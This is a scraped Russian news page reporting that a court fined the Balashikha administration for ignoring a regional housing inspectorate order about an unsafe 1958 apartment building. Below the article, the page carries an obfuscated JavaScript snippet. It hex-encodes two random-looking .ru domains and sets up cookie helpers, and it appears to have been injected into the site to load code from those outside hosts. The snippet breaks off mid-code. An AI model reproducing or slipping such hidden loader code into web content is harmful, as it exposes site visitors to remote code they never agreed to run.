Обратная связь

Напишите свои пожелания/замечания по содержанию и работе сайта.




Новости

Главные события подмосковья

Госуслуги МО Новости Правительства МО
Назад к списку новостей

Администрации Балашихи дали штраф за неисполнение предписания Госжилинспекции

Администрации Балашихи дали штраф за неисполнение предписания Госжилинспекции
08 сентября 2015 23:48 Распечатать

Суд наложил штраф на администрацию подмосковной Балашихи за неисполнение предписания областной Госжилинспекции в отношении аварийного дома, сообщает пресс-служба надзорного ведомства.

«Мировой судья наложил штраф на администрацию городского округа Балашиха за неисполнение законного предписания Госжилинспекции Московской области. Муниципальные власти не определили в установленный срок на межведомственной комиссии судьбу дома № 20 по улице Горбово, в котором были выявлены многочисленные признаки аварийности», – приводятся в сообщении слова руководителя надзорного ведомства Вадима Сокова.

Как отмечается в материале, при проверке двухэтажного здания 1958 года инспекторы установили, что состояние несущих конструкций представляло опасность жизни и здоровья жильцов. Администрации городского округа Балашиха было дано два месяца на решение судьбы дома на межведомственной комиссии. Однако предписания не были выполнены.

«Представители администрации заявляли в суде, что предписание не успели исполнить, поскольку соответствующие полномочия были переданы другому структурному подразделению и вопрос находился на изучении. Однако суд счел, что это обстоятельство не освобождает от ответственности. Поэтому суд не нашел в деле смягчающих обстоятельств и оштрафовал администрацию Балашихи», – пояснил главный Соков.

Шесть предписаний выдала Госжилинспекция органу жилконтроля в Дзержинском за нарушения

Следите за новостями в области ЖКХ Подмосковья в группах VKontakte, Facebook, Odnoklassniki и Twitter 

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="19694",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Источник: Главное управление «Государственная жилищная инспекция Московской области»